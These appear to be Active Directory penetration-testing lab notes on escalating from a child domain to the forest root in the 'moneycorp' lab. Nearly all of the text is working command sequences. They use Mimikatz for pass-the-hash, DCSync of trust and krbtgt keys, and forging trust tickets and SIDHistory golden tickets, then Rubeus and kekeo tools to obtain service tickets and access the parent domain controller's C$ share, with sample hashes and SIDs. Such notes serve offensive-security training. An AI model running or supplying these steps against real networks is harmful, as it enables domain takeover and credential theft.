Priv Esc - Across Trusts using Trust Tickets

  • Across Domains - Implicit two-way trust relationship (parent/child inside a forest).

  • Across Forests - Trust relationship needs to be established explicitly.

  • You need Domain Admin in the current (child) domain and want Enterprise Admin in the parent / forest root domain.

Priv Esc – Child to Parent

  • Child to Forest Root

  • Domains in the same forest have an implicit two-way trust with each other. There is a trust key shared between the parent and child domains.

  • There are two ways of escalating privileges between two domains of the same forest:

    • Krbtgt hash

    • Trust tickets

Child to Parent using Trust Tickets



--------------------- Child to Parent using Trust Tickets---------------------

#Open PowerShell as local admin
Import-Module .\Invoke-Mimikatz.ps1

#Get a PowerShell running as Domain Admin (overpass-the-hash with the svcadmin NTLM hash)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'


#Child to Forest Root using Trust Tickets: what is required to forge a trust ticket (inter-realm TGT) is the trust key.
#Look for the [In] trust key from child to parent (dcorp -> mcorp).

#In the new Domain Admin PowerShell, either DCSync the trust account or dump the trust keys from the child DC:
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
#or
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc


#Find the current (child) domain SID: this is the /sid value in the command below
Import-Module .\PowerView.ps1
Get-DomainSID

#Find the SID to inject into SIDHistory (/sids in the command below): a principal of the parent domain.
#The notes take the parent domain's built-in Administrator (RID 500) from the member list; the Enterprise Admins group itself is RID 519 of the same parent domain SID and works equally.
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain moneycorp.local

#Forging the ticket is an offline operation that only needs the trust key, so this can run as a low privileged user
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-500 /rc4:ecae1085d19afe5186b213739e2267ad /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'


#cd to kekeo_old where the ticket was saved and do the following:
#Get a TGS for a service (CIFS below) in the target domain by presenting the forged inter-realm TGT to the parent DC.

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
#Tickets for other services (HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting / WinRM) can be requested the same way.




#Inject the TGS into the current logon session and use it to access the targeted service (may need to run it twice).
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi
klist


#We got fileshare access:
ls \\mcorp-dc.moneycorp.local\c$



#Child to Forest Root using Trust Tickets: Rubeus can replace asktgs/kirbikator for the same result. Note that the inter-realm TGT forged above is still what is presented to the parent DC.
.\Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

ls \\mcorp-dc.moneycorp.local\c$

Child to Parent using krbtgt



#Open PowerShell as local admin
Import-Module .\Invoke-Mimikatz.ps1

#Get a PowerShell running as Domain Admin (overpass-the-hash with the svcadmin NTLM hash)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'


#Get the krbtgt hash of the child domain (DCSync as Domain Admin):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'


#Use the krbtgt hash for the following command:

#Find the current (child) domain SID: this is the /sid value in the command below
Import-Module .\PowerView.ps1
Get-DomainSID

#Find the SID to inject into SIDHistory (/sids in the command below): a principal of the parent domain.
#The notes take the parent domain's built-in Administrator (RID 500) from the member list; the Enterprise Admins group itself is RID 519 of the same parent domain SID and works equally.
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain moneycorp.local

#Open PowerShell as a low priv user to create the TGT (a golden ticket for the child domain carrying the parent SID in SIDHistory)
Import-Module .\Invoke-Mimikatz.ps1
klist purge
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-500 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'


#Inject the ticket
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
klist


#Test the access
ls \\mcorp-dc.moneycorp.local\c$


gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local



